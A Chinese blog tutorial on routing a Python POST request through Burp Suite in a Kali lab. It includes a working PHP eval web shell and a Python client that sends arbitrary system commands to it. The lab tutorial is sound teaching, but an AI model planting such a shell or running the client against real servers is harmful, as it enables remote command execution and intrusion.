使用burpsuite对python的post请求进行抓包

最新推荐文章于 2024-05-30 08:48:29 发布
最新推荐文章于 2024-05-30 08:48:29 发布
阅读量3.3k 收藏 5
点赞数 2
分类专栏: Web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45254208/article/details/119841204
版权

目录

准备好web环境

Kali 中已经有 Apache 了,在 /etc 目录下 ls 即可显示出来,所以只需要进行配置就可以了。(这里用其他 Linux 或 Windows 虚拟机都行)
在这里插入图片描述
打开 apache 服务的相关命令

/etc/init.d/apache2 start		(开启)
/etc/init.d/apache2 restart		(重启)
/etc/init.d/apache2 status		(查看状态)

在这里插入图片描述
这里在 Kali 的浏览器中输入 Kali 的 IP,可以发现已经启动apache。
在这里插入图片描述

在Kali的web根目录写一个一句话木马,这里就用PHP的一句话木马。

<?php @eval($_POST['shell']);?>

在这里插入图片描述

shell 变量用于接收 python 代码传过来的字符串。
eval() 函数将接收的字符串当作命令执行。

在这里插入图片描述

测试代码

import requests

url = str(input('目标URL:'))
passwd = str(input('连接密码:'))    # 其实就是一句话木马中的变量shell
cmd = str(input('执行命令:'))

# 将命令传给一句话木马
payload = {
    passwd: "system(\'" + cmd + "\');"
}

# 向目标url发送post请求
response = requests.post(url=url, data=payload, timeout=3)

# 回显命令执行的结果
print(response.text)

在这里插入图片描述

测试结果

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

使用burpsuite抓包

在这里插入图片描述
在这里插入图片描述

import requests

url = str(input('目标URL:'))
passwd = str(input('连接密码:'))    # 其实就是一句话木马中的变量shell
cmd = str(input('执行命令:'))

# 将命令传给一句话木马
payload = {
    passwd: "system(\'" + cmd + "\');"
}

# 使用burpsuite对python的post请求抓包
proxy = {
    'http': '127.0.0.1:8080',
    'https': '127.0.0.1:8080'
}

# 向目标url发送post请求
response = requests.post(url=url, data=payload, proxies=proxy, timeout=3)

# 回显命令执行的结果
print(response.text)

开启 burpsuite 抓包,运行 python 代码。

在这里插入图片描述
重放该 post 请求。

在这里插入图片描述
使用 burpsuite 自带的工具解码

在这里插入图片描述
解码之后,结果如下。

在这里插入图片描述
将 ls 命令改为 ifconfig 命令,结果如下。

在这里插入图片描述
在这里插入图片描述

hangshao0.0
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用python发起post请求
mysee1989的专栏
09-17 599
代码如下: #!/noah/bin/python3 -u # -*- coding: utf-8 -*- #read from mysql based on dist-id, then get enough info send to ccs import subprocess import sys import json import os import urllib.parse impor
burpsuite小白教程。手把手教学 使用burpsuite拦截浏览器请求,修改请求参数,查看返回结果
06-09
"burpsuite使用(一)---抓包,截包,改包.pdf"文件应该详细介绍了这个过程。抓包是指捕获网络上的数据包,截包是拦截并存储这些数据包,而改包则是指对这些数据包进行修改。在Burpsuite中,"Proxy"模块就是实现这些...
bp发送post请求
危言
11-11 7517
值得一提的是:除了修改方法为POST以及添加上传信息,还要加上媒体类型信息: Content-Type: application/x-www-form-urlencoded 例题一、Bugku-POST 首先抓包 接下来send to repeater。修改三个部分: 1、GET修改为POST方法 2、加上媒体类型信息:Content-Type: application/x-www-form-urlencoded 3、末尾添加需上传语句:whar=flag 即得flag 例题二、攻防世界-get_pos
WEB入门——WEB基础
HasntStartIsOver的博客
05-26 1190
Phpstudy启动的web服务器,默认其其他机器是可以访问的,而我们测试用的网站一般都是有漏洞。所以如果phpstudy直接安装在物理机上,最好限制网站只允许本地访问。一般来说URL的长度不宜过长,所以需要传递的参数比较大,使用POST请求POST相比GET安全一些,因为GET请求的参数直接暴露在URL上。——所以铭感信息不要使用GET参数传递。
深入探讨POST注入与盲注:Burpsuite实战指南
最新发布
weixin_43822401的博客
05-30 839
Burpsuite是一款集成了多种Web安全测试功能的软件,支持多种操作系统。它能够捕获、分析和修改HTTP请求,是进行SQL注入测试不可或缺的工具。
攻防世界get_post(burp suite进行get post
kuzemax的博客
04-11 1444
2.请求头, 提交POST请求, 需要比GET请求多提供几个请求头, 其中最重要的一个是 Content-Type: application/x-www-form-urlencoded。3.请求体格式, 请求头和请求体之间有一个请求空行, 也就是一行空内容, 用来分隔请求头和请求体的内容, 如果中间的空行被不小心删掉了或者多了几行空行, 都会出现异常。原文链接:https://blog.csdn.net/wangyuxiang946/article/details/120253414。
burpsuite怎么用get和post方式进行http请求?单独get或post请求以及两种方式混合请求,超详细演示
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-28 1942
在burp中怎么进行http常用的两种请求方式?
用Burp Suite发送POST请求的三要素
qq_34233203的博客
10-25 1万+
工具 使用官方Burp Suite社区免费版,开启内置浏览器拦截HTTP请求 一、开头改请求方式 POST /?id=1 HTTP/1.1 把GET改成POST,GET和POST混合请求的统一用POST。 二、中间添加一行参数 Content-Type: application/x-www-form-urlencoded 实际应用中,不写这句话会导致POST请求无效。 三、末尾空一行写POST参数 cmd=print_r(scandir("./")) 根据实际上下文构造参数,以参数
get_post 攻防世界 使用burpsuite发送GET、POST请求
热门推荐
Zhuoqian_1的博客
03-07 1万+
题面: 解题思路: 由于题面中要求使用GET方式提交变量,我们可以直接在URL中直接加入/?a=1,表示a参数为1,得到如下页面。 由于目前正在学习burpsuite,所以使用burpsuite来实现一下GET方式提交变量,步骤如下(省略设置代理部分): 1、拦截该浏览器GET请求 2、点击Action,然后Send to repeater,Repeater中有如下请求 3、将请求改为如下,点击Go 4、此时得到 5、使用POST提交方法和GET类似,将GET改为
AutoRepeater:使用Burp Suite重复执行自动HTTP请求
02-06
AutoRepeater:使用Burp Suite重复执行自动HTTP请求 tl; dr 在扩展器中导入AutoRepeater.jar 一些简要说明 AutoRepeater将仅重新发送由已定义的替换更改的请求。 当AutoRepeater收到与为给定选项卡设置的条件相匹配...
Burpsuite+1.7.26+Unlimited抓包改包发包工具
07-16
二.burp suite使用(一) --- 抓包,截包,改包 https://blog.csdn.net/jinzhichaoshuiping/article/details/47324955 1.设置浏览器-代理 127.0.0.1 8080 2.配置burp监听端口,打开burp-》Proxy-》options-》add 三...
抓包神器:burpsuite+教程
01-12
burpsuite是学习网络安全的必备软件,是一个开源的用于抓包的软件,下载文件后直接点击jar那个包就可以运行了,前提要求是一定要安装Java环境
安卓APP测试之使用Burp Suite实现HTTPS抓包方法
09-03
由于HTTPS使用SSL/TLS加密,抓包变得复杂,但通过上述步骤,我们可以利用Burp Suite进行有效的抓包和安全检查。然而,这也警示我们,如果在日常网络活动中遇到要求信任未知证书的情况,可能意味着我们的通信正在被...
BurpSuitePOST请求,Jmeter使用其信息来创建POST请求
u010804417的博客
01-10 2373
BurpSuitePOST请求,Jmeter使用其信息来创建POST请求 从网上找了一张BurpSuite抓到包的图片,如下图所示(第一个红框是原图上就有的,凑合看吧)。 BurpSuite抓到的信息: 第一行(即第二个红框上方的POST …路径 HTTP/1.1):为“请求类型”和“路径信息”。 第二个红框中的内容:对应Jmeter中的HTTP Header Manager中的信息。可直接将红框内的所有内容全部复制,然后在Jmeter的HTTP Header Manager中点击“Add from
burpsuit 抓取python request请求
qq_38641816的博客
03-10 3416
proxies = { "http": 'http://127.0.0.1:8080', "https": 'http://127.0.0.1:8080' } requests_request = partial(requests.request, proxies=proxies, verify=False, allow_redirects=False) url="https://www.baidu.com" headers={'User-Agent': 'Mozilla/5.0 (Wind
charles在mac上抓取本地python请求
fly_to_higher的博客
02-21 2753
1.首先打开charles,在Proxy中打开macOS Proxy,这样才能抓取本地请求 2.python代码中,post/get请求中添加verify = False忽略ssl认证,否则会报Caused by SSLError(SSLError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:6...
Burp Suite 常用模块简介
Hardworking666的博客
02-26 1577
Burp Suite 常用模块分为 目标站点(target)模块 代理(proxy)模块 攻击(Intruder)模块 重放(Repeater) 模块
burpsuit抓包Python requests请求 https
jxz_dz的博客
09-16 936
Home Python Requests and Burp Suite Problem:When I am conducting a pentest, I commonly write python scripts to use therequestsmodule and need to proxy them through Burp. I have been using the "Easy way out," but there are problems with doing this and ...
Burpsuite在各场景下的抓包方法(整理)
hackzkaq的博客
10-24 1万+
一、网页抓包环境需求:火狐浏览器(1) 打开测试工具BurpSuite,默认工具拦截功能是开启的,颜色较深,我们点击取消拦截。下图取消拦截状态,数据包可以自由通过:(2) 按下图顺序点击选显卡来到代理设置(3) 可以看到默认的代理设置情况,本地代理地址:127.0.0.1,代理端口8080。如果前面没有勾选一定要选择勾选。工具代理设置完毕。(4) 证书安装,浏览器输输入http://burp/,点击图示位置下载证书(5) 配置证书,打开浏览器并导入证书火狐浏览器开打开证书配置界面。
如何使用burpsuite抓包
07-27
使用Burp Suite进行抓包,您可以按照以下步骤进行操作: 1. 下载和安装Burp Suite:首先,您需要从PortSwigger官方网站下载并安装Burp Suite。他们提供了一个免费的社区版,供个人和小型团队使用。 2. 配置您的浏览器:为了使Burp Suite能够拦截和分析您的网络流量,您需要将浏览器的代理设置为Burp Suite的代理地址和端口。默认情况下,Burp Suite使用的代理地址是`localhost`,端口是`8080`。您可以在Burp Suite中的`Proxy`选项卡下找到这些设置。 3. 启动Burp Suite和浏览器:启动Burp Suite,并确保已经成功配置了代理设置。然后,启动您的浏览器,并开始浏览您想要抓包的网站。 4. 拦截和查看请求:当您通过浏览器发送请求时,Burp Suite会拦截这些请求并将其显示在其界面上的`Proxy`选项卡中。您可以在该选项卡中查看请求的详细信息,包括URL、头部、参数等。 5. 修改和重发请求:您可以对拦截到的请求进行修改,并使用Burp Suite重发它们。这对于测试应用程序的安全性和修改请求参数非常有用。 6. 拦截和查看响应:当服务器响应请求时,Burp Suite也会拦截这些响应并将其显示在`Proxy`选项卡中。您可以查看响应的详细信息,包括状态码、头部、内容等。 7. 使用其他Burp Suite功能:除了抓包功能之外,Burp Suite还提供了许多其他功能,如漏洞扫描、代理功能、重放攻击等。您可以根据需要探索并使用这些功能。 请注意,使用Burp Suite进行抓包可能涉及一些法律和道德问题。确保您在合法和授权的范围内使用它,并遵守适用的法律和规定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值